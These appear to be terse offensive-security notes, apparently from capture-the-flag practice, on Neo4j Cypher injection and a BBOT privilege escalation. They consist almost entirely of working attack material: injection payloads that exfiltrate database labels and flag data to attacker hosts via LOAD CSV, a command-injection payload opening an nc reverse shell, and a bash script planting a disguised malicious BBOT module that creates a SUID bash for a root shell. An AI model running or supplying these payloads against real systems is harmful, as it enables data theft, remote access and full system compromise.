CYPHER INJECTION :
https://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploits
NEO4J - :V
Dumpear labels:
' RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://attacker_ip /?l='+label as l RETURN 0 as _0 //
' OR 1=1 WITH 1 as dummy CALL custom.getUrlStatusCode('example.com; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.17 4444 > /tmp/f') YIELD statusCode RETURN statusCode as hash //"
#!/bin/bash
set -e
# Step 1: Create config file
echo "Creating malicious BBOT config..."
cat << EOF > /tmp/myconf.yml
module_dirs:
- /tmp/modules
EOF
# Step 2: Create modules directory
echo "Creating modules directory..."
mkdir -p /tmp/modules
# Step 3: Create malicious module
echo "Creating malicious whois2 module..."
cat << 'EOF' > /tmp/modules/whois2.py
from bbot.modules.base import BaseModule
import os
class whois2(BaseModule):
watched_events = ["DNS_NAME"]
produced_events = ["WHOIS"]
flags = ["passive", "safe"]
meta = {"description": "Query WhoisXMLAPI for WHOIS data"}
options = {"api_key": ""}
options_desc = {"api_key": "WhoisXMLAPI Key"}
per_domain_only = True
async def setup(self):
os.system("cp /bin/bash /tmp/bash && chmod u+s /tmp/bash")
self.api_key = self.config.get("api_key")
return True
async def handle_event(self, event):
pass
EOF
# Step 4: Execute BBOT to create SUID bash
echo "Executing malicious BBOT module..."
sudo /usr/local/bin/bbot -p /tmp/myconf.yml -m whois2
# Step 5: Check if SUID bash was created
if [ -u /tmp/bash ]; then
echo -e "\\n[+] SUID bash created successfully!"
echo -e "[*] Spawning root shell...\\n"
/tmp/bash -p
else
echo -e "\\n[-] Exploit failed - SUID bash not created"
exit 1
fi
# Cleanup (optional)
# rm /tmp/bash /tmp/myconf.yml /tmp/modules/whois2.py
' OR 1=1 WITH 1 as a MATCH (f:Flag) UNWIND keys(f) as p LOAD CSV FROM 'http://10.0.2.4:8000/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //